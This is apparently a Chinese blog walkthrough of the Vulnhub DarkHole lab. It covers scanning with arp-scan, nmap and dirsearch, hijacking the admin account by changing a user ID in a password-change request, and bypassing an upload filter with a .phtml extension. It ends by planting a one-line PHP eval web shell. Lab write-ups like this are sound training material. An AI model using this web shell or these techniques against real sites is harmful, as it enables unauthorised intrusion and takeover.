Vulnhub靶机: DarkHole

一、靶机介绍

1、先从vulnhub下载靶场源码

下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip

2、下载完毕,出现以下的文件算完成,把它拖进虚拟机里

3、建议在当前目录下新建一个文件夹,用来存储导入数据

出现以下页面,填写虚拟机的名称,游览选择刚才新建的文件夹

二、信息搜集

1、扫描附近的主机(使用的是kali)

arp-scan -l

发现主机

2、端口扫描

nmap -sV -A -p 0-65535 192.168.66.133

可以看见开放了两个端口

访问一下80端口,发现点击右上角存在登录页面,还可以注册,等会没准用的着

3、目录扫描

可以使用kali自带的目录扫描工具

dirsearch -u http://192.168.66.133/

成功扫描出目录,把响应码为200的拿出来

[02:29:23] 200 -  948B  - /config/
[02:29:24] 200 -   21B  - /dashboard.php                                    
[02:29:28] 200 -  810B  - /index.php                                        
[02:29:28] 200 -  810B  - /index.php/login/                                 
[02:29:29] 200 -    1KB - /js/                                              
[02:29:30] 200 -    2KB - /login.php          
[02:29:36] 200 -    3KB - /register.php  
[02:29:41] 200 -  933B  - /upload/ 

尝试访问一下,看看哪些有用

发现/upload/路径下可能存储照片的,等会没准用的上

三、利用之前搜索到的信息,开始寻找漏洞点

1、利用之前搜索到的登录和注册页面,发现不知道账户和密码,那就注册一个

使用注册的用户登录进去

发现可以修改密码,尝试能不能抓包修改管理员admin的密码

2、使用抓包工具Burp,进行抓包修改密码

输入要修改的密码,点击修改时进行抓包

抓到包修改身份标识的ID

修改完毕,尝试进行登录

发现登录成功,不愧是管理员用户,多出一个上传功能,又多一个测试的

3、尝试进行上传

先上传1.jpg试试水

点击上传时进行抓包,修改文件后缀名为.php,内容以下

<?php phpinfo();?>

发现不让上传,有限制

接下来尝试其他后缀名绕过

终于发现.phtml可以绕过

抓包修改

发现这回上传成功

图片是上传了,可是不知道路径呀,这时候就体现出信息收集的用处了

之前就发现有个图片存储的路径,拿来尝试一下

发现上传的图片确实在里面

访问一下,发现成功出现phpinfo

4、上传shell

内容以下

<?php eval($_POST['666']);?>

访问,出现空白,大概率是上传成功

使用中国蚁剑进行连接,密码为666

成功连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值